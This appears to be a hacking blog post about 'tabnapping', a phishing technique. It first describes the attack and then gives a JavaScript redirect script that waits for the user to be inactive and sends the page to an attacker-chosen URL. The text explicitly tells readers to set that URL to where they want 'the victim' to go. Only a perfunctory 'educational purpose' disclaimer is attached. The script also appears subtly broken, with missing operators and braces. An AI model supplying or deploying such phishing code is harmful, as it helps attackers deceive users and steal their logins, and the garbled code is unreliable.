Hacking Tech

Tab napping a Terrifying New Phishing Attack

Traditional phishing attacks are reasonably easy to avoid, just don’t click links in suspicious e-mails (or, for the really paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious way to launch an attack by hijacking your unattended browser tabs.

The attack works by first detecting that the tab the page is in does not have focus. Then the attacking script can change the tab favicon and title before loading a new site, say a fake version of gmail or orkut, in the background.

Even scarier, the attack can parse through your history to find sites you actually visit and impersonate them.

Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As Raskin writes, "as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is mailable and moldable and the user will most likely simply think they left [the] tab open.”

The only clue that you’re being tricked is that the URL will be wrong.

<a> open this in a tab of your browser and wait for 10 seconds and see after you come back but leave this page and go to other tab to see this magic.</a>

var xScroll, yScroll, timerPoll, timerRedirect, timerClock;

function initRedirect(){
 if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz

xScroll = document.body.scrollLeft;

yScroll = document.body.scrollTop;

clearInterval(timerPoll); //stop polling scroll move
 clearInterval(timerRedirect); //stop timed redirect

timerPoll = setInterval("pollActivity()",1); //poll scrolling

timerRedirect = setInterval("location.href='YOUR PAGE URL'",10000); //set timed redirect

}
 else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead

xScroll = window.pageXOffset;

yScroll = window.pageYOffset;

clearInterval(timerPoll); //stop polling scroll move

clearInterval(timerRedirect); //stop timed redirect

timerPoll = setInterval("pollActivity()",1); //poll scrolling

timerRedirect = setInterval("location.href='YOUR PAGE URL'",10000); //set timed redirect

}

//else do nothing

}

function pollActivity(){

if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz

(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers

initRedirect(); //reset polling scroll position

}

document.onmousemove=initRedirect;

document.onclick=initRedirect;

document.onkeydown=initRedirect;

window.onload=initRedirect;

window.onresize=initRedirect;

</script>

Replace the YOUR PAGE URL here with your URL where you want the victim to redirect.

Use This Script in the Page and then the page will redirect after 10 sec when the user if not on the particular tab.

Note :- This Tutorial is for educational purpose do not use this in any illegal activities.

Thanks and Please Leave Your Comments.

Quick Links

Partner Sites